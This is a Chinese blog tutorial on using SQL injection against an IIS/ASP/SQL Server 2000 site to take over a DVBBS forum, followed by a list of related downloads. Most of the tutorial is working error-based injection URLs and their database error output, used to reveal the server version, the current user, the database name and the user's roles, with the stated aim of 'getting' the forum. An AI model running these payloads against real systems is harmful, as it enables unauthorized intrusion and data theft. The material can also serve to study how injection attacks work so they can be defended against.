`
wanjianfei
  • 浏览: 308039 次
  • 性别: Icon_minigender_1
  • 来自: 北京
社区版块
存档分类
最新评论

SQL注入入侵动网SQL版论坛

阅读更多
现在动网最新版本是7.0+SP2。应该说安全性已经是很高的了。所以从脚本本身的问题去突破它难度不小。但是我们可以从外部的一些途径间接“搞定”动网.现在IIS+ASP+SQL2000的组合是比较常见的。而一个网站运用大量的ASP脚本程序,难免不出纰漏。如果一台主机上存在某个SQL注入点,而这台主机又安装有动网SQL版的话,基本上可以得出结论:这个动网就是你的了。下面来看一下实例。

  一、 首先确定目标

  假设以下URL存在SQL注入:
http://www.loveyou.com/type.asp?id=6 测试能否注入可以在6后面加个单引号。
http://www.loveyou.com/type.aspid=6' 返回错误提示:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。

  继续,先探测一下系统版本:
http://www.loveyou.com/type.asp?id=(select @@version)--
  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver]
[SQL Server]将 nvarchar 值 'Microsoft SQL Server
2000 - 8.00.760 (Intel X86) Dec 17 2002
14:22:05 Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。

  看来已经打上最新的SP4补丁。

  取得当前连接数据库用户:
http://www.loveyou.com/type.asp?id=(select user_name())--

  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver]
[SQL Server]将 nvarchar 值 'webuser' 转换为数据类型为 int 的列时发生语法错误。

  从错误信息中得到当前数据库用户为:webuser
  取得当前连接数据库名:
http://www.loveyou.com/type.asp?id=(select db_name())--

  返回:
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 '01city' 转换为数据类型为 int 的列时发生语法错误。

  从错误信息中得到当前数据库名为: 01city

  接下来测试下权限:(注:因为我们的目的是搞定动网而不是侵占系统。所以数据库权限对我们不是很重要。)
http://www.loveyou.com/type.asp?id=
(SELECT IS_SRVROLEMEMBER('sysadmin'))--

  返回错误信息。提示当前记录已删除。看来权限果然不是很高耶。继续,
http://www.loveyou.com/type.asp?id=
(SELECT%20IS_MEMBER('db_owner'))--

  正常显示信息,看来连接数据库拥有的权限是DB_OWNER(DOWN数据库所有者。但对操纵数据是绰绰有余了。

分享到:
评论

相关推荐

    SQL注入全面讲解技术文档

    SQL注入漏洞全接触 注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上对它的讨论很热烈,所以我在本期专题中为读者揭示SQL攻击的...13.利用SQL注入2分钟入侵网站全程实录 45

    sql注入sql注入sql注入sql注入sql注入

    sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入sql注入

    小试SQL注入轻松入侵网站.pdf

    小试SQL注入轻松入侵网站.pdf

    sql注入语句sql注入语句sql注入语句

    sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句...

    超级sql注入工具

    超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...

    sql注入工具sql注入工具sql注入工具sql注入工具

    sql注入工具sql注入工具sql注入工具sql注入工具sql注入工具sql注入工具

    SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。

    宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(...SQL注入漏洞测试(参数加密)、SQL手工注入漏洞测试(MySQL数据库)、SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入...

    整站防止SQL注入式入侵 -

    整站防止SQL注入式入侵 - 整站防止SQL注入式入侵 -

    SQL注入攻击与防御(第2版).part1

    SQL注入攻击是一种已经长期存在,但近年来日益增长的安全威胁,《安全技术经典译丛:SQL注入攻击与防御(第2版)》致力于深入探讨SQL注入问题。  《安全技术经典译丛:SQL注入攻击与防御(第2版)》前一版荣获2009...

    超级SQL注入工具 V1.0 绿色免费版

    超级SQL注入工具 V1.0 绿色免费版,可用于批量检测是否有注入漏洞,可对单个站点进行注入,很多强大功能。

    《SQL注入攻击与防御 第2版》PDF版本下载.txt

    《SQL注入攻击与防御 第2版》PDF版本下载

    C#防SQL注入代码的三种方法

    对于网站的安全性,是每个... 四:屏蔽SQL,javascript等注入(很是主要的),对于每个文件写是不太可能的。所以要找到对所有文件起作用的办法。我在网上收集了以下3种方法  C#防SQL注入方法一  在Web.config文件中

    SQL注入手工检测sql注入检测

    sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测sql注入检测

    SQL 注入天书.pdf

    SQL 注入学习天书

    SQL注入过滤 (Java版)

    SQL 安全注入漏洞过滤器类 Java实现 Java类实现,以及配置文件web.xml

    安全测试-常见sql注入方法,命令

    安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...

    防SQL注入脚本防SQL注入脚本

    防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL注入脚本防SQL...

    filter 防止SQL注入(替换特殊字符版)

    filter 防止SQL注入 替换特殊不合格字符。 <!-- 防SQL注入 <filter-name>SQLFilter <filter-class>frame.struts.SQLFilter <filter-name>SQLFilter <url-pattern>/* </filter-mapping> --> 配置...

    SQL注入攻击与防御

    SQL注入是Internet上最危险、最有名的安全漏洞之一,《SQL注入攻击与防御》是目前唯一一本专门致力于讲解SQL威胁的图书。《SQL注入攻击与防御》作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的...

Global site tag (gtag.js) - Google Analytics